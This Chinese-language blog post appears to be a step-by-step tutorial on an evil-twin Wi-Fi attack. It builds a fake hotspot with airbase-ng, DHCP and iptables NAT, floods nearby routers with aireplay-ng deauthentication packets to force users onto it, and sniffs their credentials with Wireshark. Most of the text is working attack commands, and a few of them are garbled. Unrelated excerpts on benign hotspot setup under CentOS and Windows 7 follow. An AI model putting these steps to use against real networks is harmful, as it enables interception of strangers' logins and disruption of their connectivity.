本帖介紹怎麼建立假的wifi熱點,然後抓取連線到這個wifi使用者的敏感資料。我們還會給周圍的無線路由器傳送未認證的包,使這些路由器癱瘓,強迫使用者連線(或自動連線)我們建立的假wifi熱點。
這種攻擊也叫」水坑攻擊」-把其他使用者都聚集到乙個」坑」中。
# route -n
這個值在設定iptables時會用到。
用處: 為連線假wifi的使用者分配ip。
# apt-get install isc-dhcp-server
配置dhcp:
# vim /etc/dhcp/dhcpd.conf
檔案中內容:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.10.0 netmask 255.255.255.0
先不啟動dhcp服務。
# airmon-ng start wlan0
# airmon-ng check kill
把wlan0替換為你的無線網絡卡介面。
要退出監控模式,執行:
# airmon-ng stop wlan0mon
# airbase-ng -c 11 -e fake_wifi wlan0mon
不要終止這個命令。
現在你已經建立了乙個wifi熱點,但是這個wifi目前還不能連線。
設定網路和防火牆規則
# ifconfig at0 up
# ifconfig at0 192.168.10.1 netmask 255.255.255.0
# ifconfig at0 mtu 1400
# route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1
# iptables --flush
# iptables --table nat --flush
# iptables --delete-chain
# iptables --table nat --delete-chain
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -a prerouting -p udp -j dnat --to 192.168.0.1
# iptables -p forward accept
# dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
# systemctl start isc-dhcp-server
遇到的問題:
pid file: /var/run/dhcpd.pid
can't open lease database /var/lib/dhcp/dhcpd.leases: no such file or directory --
建立這個檔案解決這個問題:
# mkdir /var/lib/dhcp/
# touch /var/lib/dhcp/dhcpd.leases
到此,wifi熱點建立完成
列出周圍的wifi:
# airodump-ng wlan0mon
然後選擇你的目標,記住bssid和頻道。
設定頻道:
# iwconfig wlan0mon channel 《頻道號》
開始deauthentication攻擊:
# aireplay-ng -0 5000 -a wlan0mon --ignore-negative-one
ok,現在你可以愉快的抓包了。
例如使用wireshark抓包:
上圖抓到了我手機郵件客戶端登入的郵箱賬戶。
更多:
centos下建立wifi熱點
最近一段時間看了一篇文章,是關於在linux下設定無線熱點的。當時覺得好新奇,linux下還可以設定wifi。直到上個禮拜我把我的筆記本裝了乙個centos6.5。音效卡,無線網絡卡都自己安裝好了,我都沒有去找。我的筆記本型號是v480c。這裡說一下步驟吧 系統 首選項 網路連線 新增 無線 新建 ...
Win7 建立Wifi熱點
一 以管理員身份執行 命令提示符 在命令提示符下游標閃爍處輸入 netsh wlan set hostednetwork mode allow ssid leon key 123456789 按回車鍵會出現有關提示。ssid 站點名,key 密碼 防止他人接入你的網路,俗稱蹭網 二 當步驟一設定成功...
win7建立wifi熱點
有一些路由器沒有wifi功能的,咱們電腦只能使用網線上網,而手機沒法接網線,這時就可以用接網線的電腦建立乙個wifi熱點,使手機能用wifi上網 1.以管理員許可權執行這條命令 netsh wlan set hostednetwork mode allow ssid mywifi key syspr...